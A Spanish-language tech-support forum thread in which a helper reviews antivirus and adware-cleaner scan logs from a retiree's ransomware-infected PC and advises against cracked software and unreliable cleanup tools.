HackTool.FilePatch, C:\USERS\HETITOR\APPDATA\LOCAL\TEMP\RAR$EXA10408.38092\GRIDINSOFT ANTI-MALWARE 4.1.51.4977 + PATCH FULL VERSION SUPPORT 32BIT-64BIT\PATCH.RAR, En cuarentena, 7500, 281135, 1.0.29159, 8568DA4BE6BB35E91339F335, dds, 00871568, 3F8B2D4E83345CA6D64FE82220595C47, F1F06F48106A77D70A72C442E7F666367EB88F113D54E890E4B8FBEA5315D7CC
Adware.Elex.ShrtCln, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000005.ldb, En cuarentena, 297, 454688, , , , , D90165E729443346DE1D44FD64D344AA, 1DF0CBC3041F37CEF2EC62C9E9E76475EC9B34375C1DFB551DAF1B7D1D98BC14
Adware.Elex.ShrtCln, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.ldb, En cuarentena, 297, 454688, , , , , 6599F24040267B493C1F99D6A015520D, 45CFB087C10C7560F091FDB29AF23D4EF77BC51CAECC46DDC38C8598DCEFE9FE
Adware.Elex.ShrtCln, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000009.log, En cuarentena, 297, 454688, , , , , C14655B17BF777F720ACD84345A2E3B4, 37953BB206A15D22F07CD72B9A8405FBC84143D115C53C8FBF7E95D9812AEC9B
Adware.Elex.ShrtCln, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000010.ldb, En cuarentena, 297, 454688, , , , , 5E504F52BD606F92324D17A295C5F364, 3D37B9BFB4C457C79ABE01538EA4539545DD208BF11B5CC2E56B1241C6B40AE2
Adware.Elex.ShrtCln, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT, En cuarentena, 297, 454688, , , , , 46295CAC801E5D4857D09837238A6394, 0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
Adware.Elex.ShrtCln, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK, En cuarentena, 297, 454688, , , , , ,
Adware.Elex.ShrtCln, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG, En cuarentena, 297, 454688, , , , , 9B7771CB73318CDAE6E3DBFF72972F06, 5462B33C91B1A6E2092AC876F9B90711EA573A07D4AF9B89886AAA18A18A6191
Adware.Elex.ShrtCln, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old, En cuarentena, 297, 454688, , , , , 1F7CD4B116B791AA6BA279AD091CBADE, 8D1C784DF9617B1F2321E69D9CFABA913D656C55E33DFE3D0BE66A82485D15C4
Adware.Elex.ShrtCln, C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001, En cuarentena, 297, 454688, , , , , D1AFB44FC1E9FF7E8D26748FFF90B28B, F848B2F91BB4DA74F760F79C68900BAA7502D42A926E0731097A1E73E57EC0C2
Adware.Elex.ShrtCln, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sustituido, 297, 454688, 1.0.29159, , ame, , D7A02D530953ABF8EB44A164B9654A24, 17C20BBC0A3F56A1400411EBD943508C5E0F9DA01A5AEE2DD76614B6FE8E6D68
PUP.Optional.SonicSearch, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sustituido, 435, 519968, 1.0.29159, , ame, , D7A02D530953ABF8EB44A164B9654A24, 17C20BBC0A3F56A1400411EBD943508C5E0F9DA01A5AEE2DD76614B6FE8E6D68
PUP.Optional.Linkury.Generic, C:\USERS\HETITOR\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sustituido, 198, 454805, 1.0.29159, , ame, , D7A02D530953ABF8EB44A164B9654A24, 17C20BBC0A3F56A1400411EBD943508C5E0F9DA01A5AEE2DD76614B6FE8E6D68
Sector físico: 0
(No hay elementos maliciosos detectados)
WMI: 0
(No hay elementos maliciosos detectados)
(end)
# --------------
# Malwarebytes AdwCleaner 8.0.7.0
# --------------
# Build: 07-22-2020
# Database: 2020-07-20.1 (Cloud)
# Support: https://www.malwarebytes.com/support
# ---------------
# Mode: Scan
# ----------------
# Start: 08-28-2020
# Duration: 00:00:16
# OS: Windows 10 Pro
# Scanned: 31837
# Detected: 3
*** [ Services ] ***
No malicious services found.
*** [ Folders ] ***
PUP.Optional.AdvancedSystemCare C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare
PUP.Optional.AdvancedSystemCare C:\Users\Hetitor\AppData\Roaming\IObit\Advanced SystemCare
*** [ Files ] ***
No malicious files found.
*** [ DLL ] ***
No malicious DLLs found.
*** [ WMI ] ***
No malicious WMI found.
*** [ Shortcuts ] ***
o malicious shortcuts found.
*** [ Tasks ] ***
No malicious tasks found.
*** [ Registry ] ***
PUP.Optional.AdvancedSystemCare HKLM\Software\Wow6432Node\IOBIT\ASC
*** [ Chromium (and derivatives) ] ***
No malicious Chromium entries found.
*** [ Chromium URLs ] ***
No malicious Chromium URLs found.
*** [ Firefox (and derivatives) ] ***
No malicious Firefox entries found.
*** [ Firefox URLs ] ***
No malicious Firefox URLs found.
*** [ Hosts File Entries ] ***
No malicious hosts file entries found.
*** [ Preinstalled Software ] ***
No Preinstalled Software found.
AdwCleaner[S00].txt - [3737 octets] - [25/08/2020 08:41:34]
AdwCleaner[C00].txt - [3357 octets] - [25/08/2020 08:42:06]
AdwCleaner[S01].txt - [1716 octets] - [26/08/2020 13:13:50]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S02].txt ##########
Disculpá la lata, y gracias por tu dedicación a mi tema…
Hola
He eliminado el informe, era muy largo y no nos hacía falta, por lo que he visto se han encriptado los archivos en linea por lo que no hay forma de recuperarlos por el momento.
Has utilizado ComboFix, no es una herramienta que se pueda utilizar sin que te lo haya indicado un experto, puede dañar tu equipo.
Los productos de Iobit no son muy recomendables, no porque sea enemigo de Malwarebytes, pero eso ya es decisión de cada cual.
No conozco ese programa, pero lo que si que te puedo decir, que al ser crackeado carece de toda confianza.
Cómo ya te he dicho, no es nada fiable …
Estás utilizando muchos programas poco confiables y además crackeados, una de las causas de que te hayan infectado con un ransomware y se hayan cifrado archivos.
Por lo que te he dicho con anterioridad, con tantos programas que has pasado, no seguros, a saber que te puedan haber eliminado
Vamos a ver si hay algo más en tu equipo.
Realizas lo siguiente:
Análisis del PC con Eset Online Scaner : Manual de Uso lee las instrucciones para salvar el reporte.
Análisis del PC con Kasperky Virus Removal Tool: Manual de Uso
- Este no da reporte cuando te encuentres al finalizar, si es que lo hace con alguna infección, tomas una imagen y la subes.
Comenta como sigue el problema.
Un saludo
Hola Daniela, he ejecutado los programas que me indicaste y mas abajo te adjunto los resultados, Solo quería comentarte sobre tu alusión a la cantidad de programas craqueado, que eso obedece a que yo soy un Jubilado Argentino que percibe u$s 130.- por mes y con eso no alcanza para comprar programas. Por último ayer eliminé una cantidad del .txt intimidatorio, pero hay dos que no lo permitían.
29/8/2020 12:41:55
Archivos explorados: 1173397
Archivos detectados: 136
Archivos desinfectados: 136
Tiempo total de exploración 04:00:12
Estado de la exploración: Finalizado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$R1XPMGB.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$R6HPHE2.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RBLQHHX.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RCUKO06.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RDGC35B.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RIH6HCK.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RJ6AC2O.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RJEB0O8.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RJUXW5H.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RJWB2MZ.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RKQTX6H.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RKZ7P25.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RMXBI8Z.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RO87TU8.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$ROUBV31.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RPVKI0N.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RQ5D6KC.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RQQN141.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RU84H49.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RUE4RIK.txt Win32/Filecoder.STOP troyano eliminado
C:\$Recycle.Bin\S-1-5-21-1406036411-3523515736-3522702373-1001\$RVDXLE5.txt Win32/Filecoder.STOP troyano eliminado
C:\AdwCleaner\Quarantine\v1\20200825.084158\16\windefender.exe#EE41CB463B852F74 una variante de Win32/RanumBot.J troyano desinfectado por eliminación
C:\AdwCleaner\Quarantine\v1\20200825.084158\27\SCHEDULEDUPDATE#768125DA146C6951 XML/TrojanDownloader.Agent.B troyano desinfectado por eliminación
C:\Antivirus\GridinSoft AM\(64-bit) GridinSoft Anti-Malware v4.1.x Patcher.exe una variante de Win32/HackTool.Patcher.AD aplicación potencialmente no segura desinfectado por eliminación
C:\Users\Hetitor\AppData\Local\Google\Chrome\User Data\Default\Extensions\cklfpbibfpnmcdkpchpdnknflncpopjg\1.0.0.0_0\d8yI+Hf7rX.js JS/Adware.Revizer.F aplicación desinfectado por eliminación
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R05FQMM.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R0O2TKR.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R1AULF6.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R22IYYL.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R2SXFYE.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R4EPJC6.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R58WOE9.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R5HPTGV.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R62068G.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R6936A6.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R7P3ZMU.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R7U8JL2.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R8CHH5R.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R9BTW5I.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R9KL0RB.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R9UHEX9.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RAEB0O9.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RATJAZ6.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RC5XUJA.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RCINBVF.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RDRL9MJ.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RF70592.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RGZ1PC3.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RKM3JMW.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RKN3QRD.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RM6VRFP.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RMTBLA1.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RNTT9LE.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$ROSAMI2.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RPNCH7U.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RQK4OYQ.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RS75ITT.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RSWWUS6.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RTFGII1.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RU9OA3B.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RUDCQLP.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RWD8QSC.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RWGDR70.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RXQVETD.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RZI6T1A.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RZL934H.txt Win32/Filecoder.STOP troyano eliminado
E:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RZV1M3F.txt Win32/Filecoder.STOP troyano eliminado
E:\AdwCleaner\quarantine\frAQBc8Wsa\ASC10\Driver Booster.exe una variante de Win32/IObit.I aplicación potencialmente no deseada,una variante de Win32/IObit.AN aplicación potencialmente no deseada,una variante de Win32/IObit.AH aplicación potencialmente no deseada,una variante de Win32/IObit.AG aplicación potencialmente no deseada,una variante de Win32/IObit.D aplicación potencialmente no deseada desinfectado por eliminación
E:\AdwCleaner\quarantine\frAQBc8Wsa\IU6\Smart Defrag.exe una variante de Win32/IObit.AN aplicación potencialmente no deseada,una variante de Win32/IObit.E aplicación potencialmente no deseada,una variante de Win32/IObit.AH aplicación potencialmente no deseada,una variante de Win32/IObit.J aplicación potencialmente no deseada,una variante de Win32/IObit.AS aplicación potencialmente no deseada,una variante de Win32/IObit.D aplicación potencialmente no deseada desinfectado por eliminación
E:\Program Files\YTlmODY2OWI4Mzc\NmQ3MTZhMmQ.exe una variante de Win32/Adware.Zdengo.BWH aplicación desinfectado por eliminación
E:\Program Files (x86)\GRETECH\GOMPlayer\Uninstall.exe una variante de Win32/GOMLab.A aplicación potencialmente no deseada desinfectado por eliminación
E:\Program Files (x86)\Mozilla Firefox\Optimizers\Fuo\Firefox Ultimate Optimizer.exe MSIL/FireOptimizer aplicación potencialmente no segura desinfectado por eliminación
E:\ProgramData\IObit\ASCDownloader\ASC11\DriverBoosterSetup.exe una variante de Win32/IObit.I aplicación potencialmente no deseada,una variante de Win32/IObit.AE aplicación potencialmente no deseada,una variante de Win32/IObit.AH aplicación potencialmente no deseada,una variante de Win32/IObit.AU aplicación potencialmente no deseada,una variante de Win32/IObit.AG aplicación potencialmente no deseada,una variante de Win32/IObit.D aplicación potencialmente no deseada desinfectado por eliminación
E:\ProgramData\IObit\ASCDownloader\ASC11\IUSetup.exe una variante de Win32/IObit.AD aplicación potencialmente no deseada,una variante de Win32/IObit.AQ aplicación potencialmente no deseada,una variante de Win32/IObit.AE aplicación potencialmente no deseada,una variante de Win32/IObit.AF aplicación potencialmente no deseada desinfectado por eliminación
E:\ProgramData\IObit\ASCDownloader\ASC12\Driver Booster.exe una variante de Win32/IObit.AN aplicación potencialmente no deseada,una variante de Win32/IObit.AE aplicación potencialmente no deseada,una variante de Win32/IObit.AQ aplicación potencialmente no deseada,una variante de Win32/IObit.AU aplicación potencialmente no deseada,una variante de Win32/IObit.AG aplicación potencialmente no deseada desinfectado por eliminación
E:\ProgramData\IObit\ASCDownloader\ASC12\DriverBoosterSetup.exe una variante de Win32/IObit.AJ aplicación potencialmente no deseada,una variante de Win32/IObit.AE aplicación potencialmente no deseada,una variante de Win32/IObit.AH aplicación potencialmente no deseada,una variante de Win32/IObit.AU aplicación potencialmente no deseada,una variante de Win32/IObit.AG aplicación potencialmente no deseada,una variante de Win32/IObit.Z aplicación potencialmente no deseada desinfectado por eliminación
E:\ProgramData\IObit\ASCDownloader\av11\ASCSetup.exe una variante de Win32/IObit.AN aplicación potencialmente no deseada,una variante de Win32/IObit.AG aplicación potencialmente no deseada,una variante de Win32/IObit.AE aplicación potencialmente no deseada,una variante de Win32/IObit.AH aplicación potencialmente no deseada,una variante de Win32/IObit.M aplicación potencialmente no deseada,una variante de Win32/IObit.AD aplicación potencialmente no deseada,una variante de Win32/IObit.D aplicación potencialmente no deseada desinfectado por eliminación
E:\ProgramData\IObit\IObit Uninstaller\Downloader\un8\IObit Software Updater SU_IU.exe una variante de Win32/IObit.AK aplicación potencialmente no deseada,una variante de Win32/IObit.AQ aplicación potencialmente no deseada,una variante de Win32/IObit.AD aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Administrador.TRABAJO\AppData\Local\Google\Chrome\User Data\Default\Extensions\nladljmabboanhihfkjacnnkgjhnokhj\1.3.10.4_0\js\background.js JS/WebCompanion.A aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Local\Temp\is-0LL6E.tmp\Setup.exe una variante de Win32/IObit.AX aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Local\Temp\scoped_dir4020_488429895\uTorrent.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada,una variante de Win32/WebCompanion.B aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Local\Temp\scoped_dir7760_928850613\aTube_Catcher_1703764669.exe Win32/InstallCore.AZE.Gen aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\DRPSu\Alice\cloud.exe una variante de Win32/DriverPack.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\DRPSu\PROGRAMS\DriverPack-Alice.exe una variante de Win32/DriverPack.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.4.2_34309.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.4.2_35702.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.4.5_41865.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.5.1_44332.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.5.3_44358.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.5.3_44396.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.5.3_44428.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada,una variante de MSIL/WebCompanion.A aplicación potencialmente no deseada,una variante de Win32/WebCompanion.B aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.5.3_44494.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.5.4_44846.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.5.5_44994.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.5.5_45146.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.5.5_45271.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.5.5_45291.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.5.5_45341.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\updates\3.5.5_45395.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\AppData\Roaming\uTorrent\uTorrent.exe una variante de Win32/uTorrent.C aplicación potencialmente no deseada desinfectado por eliminación
E:\Users\Hetitor\Descargas\Programs\aTube_Catcher_1269469156.exe Win32/InstallCore.AZE.Gen aplicación potencialmente no deseada desinfectado por eliminación
E:\Utilitarios\KMSpico\scripts\Install_Service.cmd Win32/HackKMS.AZ aplicación potencialmente no segura desinfectado por eliminación
E:\Utilitarios\KMSpico\scripts\Silent.cmd Win32/HackKMS.AZ aplicación potencialmente no segura desinfectado por eliminación
E:\Windows\[email protected] una variante de Win64/HackKMS.D aplicación potencialmente no segura desinfectado por eliminación
G:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$R7H4PLA.txt Win32/Filecoder.STOP troyano eliminado
G:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RA6P1AW.txt Win32/Filecoder.STOP troyano eliminado
G:\Download Juegos\Angry Birds Seasons Installer_2.5.0\AngryBirdsSeasonsInstaller_2.5.0.com\Patch\Patch.exe una variante de Win32/HackTool.Patcher.D aplicación potencialmente no segura desinfectado por eliminación
G:\Download Juegos\AngryBird Rio full\Angry.Birds.Rio.v1.2.2 + Crack\Patch\Patch.exe una variante de Win32/HackTool.Patcher.D aplicación potencialmente no segura desinfectado por eliminación
G:\Download Juegos\Bad Piggies v1 0 0 cracked-THETA\Bad.Piggies.v1.0.0.cracked-THETA\Patch\Patch.exe una variante de Win32/HackTool.Patcher.D aplicación potencialmente no segura desinfectado por eliminación
G:\Download Juegos\Plantas vs. Zombies\BTTVBFPlantas vs Zombies 2.exe una variante de Win32/Toolbar.Babylon.F aplicación potencialmente no deseada desinfectado por eliminación
G:\JUEGOS\Angry birds 2015\Angry Birds\copy.exe Win32/BadJoke.Delf.NAW aplicación potencialmente no segura desinfectado por eliminación
G:\JUEGOS\Angry Birds Rio\Patch.exe una variante de Win32/HackTool.Patcher.D aplicación potencialmente no segura desinfectado por eliminación
G:\System Volume Information\_readme.txt Win32/Filecoder.STOP troyano eliminado
H:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RDHKBGS.txt Win32/Filecoder.STOP troyano eliminado
H:\$RECYCLE.BIN\S-1-5-21-1406036411-3523515736-3522702373-1001\$RNVWOIR.txt Win32/Filecoder.STOP troyano eliminado
H:\Craqueadores\Windows7 - Validar\Chew-WGA.eXe Win32/HackTool.WinActivator.N aplicación potencialmente no segura desinfectado por eliminación
H:\Downloads Software\Malwarebytes.Premium.v3.3.1.2183.Multilingual.Keygen-URET\Bloquear.cmd BAT/HostsChanger.A aplicación potencialmente no segura desinfectado por eliminación
H:\Downloads Software\Memories on TV clip package\MemoriesOnTV Clipshow Package Volume\Keygen\KEYGEN.EXE una variante de Win32/Keygen.AG aplicación potencialmente no segura desinfectado por eliminación
H:\Downloads Software\Movavi Video Converter 16.2.0\Crack\Converter.exe una variante de Win32/HackTool.Patcher.N aplicación potencialmente no segura desinfectado por eliminación
H:\Downloads Software\PicosmosShows2020_05_20\PTSetup2.6.0.0.exe una variante de Win32/FusionCore.AX aplicación potencialmente no deseada desinfectado por eliminación
H:\Downloads Software\Pinnacle Studio - Im_ NewBlue Oll_now\NewBlue Total FX v3.0\keygen.exe una variante de Win32/Keygen.HU aplicación potencialmente no segura desinfectado por eliminación
H:\Downloads Software\Pinnacle Studio 18.5.1\PinnacleStudio 18.5.1 keygen.exe una variante de Win32/Keygen.AU aplicación potencialmente no segura eliminado
H:\Downloads Software\SpyHunter-4\SpyHunter-4.28.5.4848.exe varias amenazas,Win32/Adware.HiRu.K aplicación,Win32/Adware.HiRu.I aplicación desinfectado por eliminación
H:\HECTOR\MagicISO\magiciso.5.5.build.0273.patch.by.team.Black_X.exe Win32/HackTool.Patcher.A aplicación potencialmente no segura desinfectado por eliminación
H:\System Volume Information\_readme.txt Win32/Filecoder.STOP troyano eliminado
H:\Utilitarios\Beyond Compare 3\keygen.exe Win32/Keygen.PX aplicación potencialmente no segura desinfectado por eliminación
H:\Utilitarios\DriverGenius\DriverGenius.exe una variante de Win32/DriverGenius.C aplicación potencialmente no deseada desinfectado por eliminación
H:\Utilitarios\KMSpico\scripts\AddExceptionsWD.reg Win32/HackKMS.AZ aplicación potencialmente no segura desinfectado por eliminación
H:\Utilitarios\KMSpico\scripts\Install_Service.cmd Win32/HackKMS.AZ aplicación potencialmente no segura desinfectado por eliminación
H:\Utilitarios\KMSpico\scripts\Install_Task.cmd Win32/HackKMS.AZ aplicación potencialmente no segura desinfectado por eliminación
H:\Utilitarios\KMSpico\scripts\Silent.cmd Win32/HackKMS.AZ aplicación potencialmente no segura desinfectado por eliminación
H:\Utilitarios\Smart Defrag\Setup.exe una variante de Win32/IObit.AX aplicación potencialmente no deseada desinfectado por eliminación
H:\Utilitarios\Smart Defrag\Vulnerabilityfix_1908.exe una variante de Win32/IObit.AG aplicación potencialmente no deseada desinfectado por eliminación
H:\Utilitarios\Trial-Resetv4.0 Final\Plugins\BlindWrite.dll una variante de Win32/HackTool.TrialKiller.E aplicación potencialmente no segura desinfectado por eliminación
H:\Utilitarios\Trial-Resetv4.0 Final\Plugins\GAlcott.com.dll una variante de Win32/HackTool.TrialKiller.E aplicación potencialmente no segura desinfectado por eliminación
H:\Utilitarios\Trial-Resetv4.0 Final\Plugins\Zylom.dll una variante de Win32/HackTool.TrialKiller.E aplicación potencialmente no segura desinfectado por eliminación
